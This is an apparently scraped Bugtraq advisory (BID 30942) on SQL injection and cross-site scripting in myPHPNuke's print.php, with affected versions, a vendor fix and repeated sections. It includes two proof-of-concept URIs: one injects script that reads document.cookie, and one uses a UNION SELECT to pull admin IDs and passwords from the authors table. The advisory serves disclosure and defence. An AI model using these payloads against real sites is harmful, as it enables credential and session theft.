myPHPNuke 'print.php' SQL Injection and Cross-Site Scripting Vulnerabilities
BID:30942
Info
myPHPNuke 'print.php' SQL Injection and Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 30942 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4088 CVE-2008-4089 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 31 2008 12:00AM |
| Updated: | Sep 27 2010 05:10PM |
| Credit: | MustLive |
| Vulnerable: |
myPHPNuke myPHPNuke 1.8.8 _final_7 myPHPNuke myPHPNuke 1.8.8 myPHPNuke myPHPNuke 1.8.8_8 myPHPNuke myPHPNuke 0 |
| Not Vulnerable: |
myPHPNuke myPHPNuke 1.8.8_8rc2 |
Discussion
myPHPNuke 'print.php' SQL Injection and Cross-Site Scripting Vulnerabilities
myPHPNuke is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Attackers may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to myPHPNuke 1.8.8_8rc2 are vulnerable.
NOTE: myPHPNuke 1.8.8_8rc2 has been reported still vulnerable to certain limited SQL-injection attacks.
myPHPNuke is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Attackers may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to myPHPNuke 1.8.8_8rc2 are vulnerable.
NOTE: myPHPNuke 1.8.8_8rc2 has been reported still vulnerable to certain limited SQL-injection attacks.
Exploit / POC
myPHPNuke 'print.php' SQL Injection and Cross-Site Scripting Vulnerabilities
An attacker can exploit these issues through a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting user to follow a malicious URI.
The following proof-of-concept URIs are available:
http://www.example.com/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E
http://www.example.com/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1
An attacker can exploit these issues through a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting user to follow a malicious URI.
The following proof-of-concept URIs are available:
http://www.example.com/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E
http://www.example.com/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1
Solution / Fix
myPHPNuke 'print.php' SQL Injection and Cross-Site Scripting Vulnerabilities
Solution:
The vendor has addressed these issues in myPHPNuke 1.8.8_8rc2.
NOTE: myPHPNuke 1.8.8_8rc2 has been reported still vulnerable to certain limited SQL-injection attacks.
Solution:
The vendor has addressed these issues in myPHPNuke 1.8.8_8rc2.
NOTE: myPHPNuke 1.8.8_8rc2 has been reported still vulnerable to certain limited SQL-injection attacks.
References
myPHPNuke 'print.php' SQL Injection and Cross-Site Scripting Vulnerabilities
References:
References:
- myPHPNuke Homepage (myPHPNuke)
- myPHPNuke Project Page (myPHPNuke)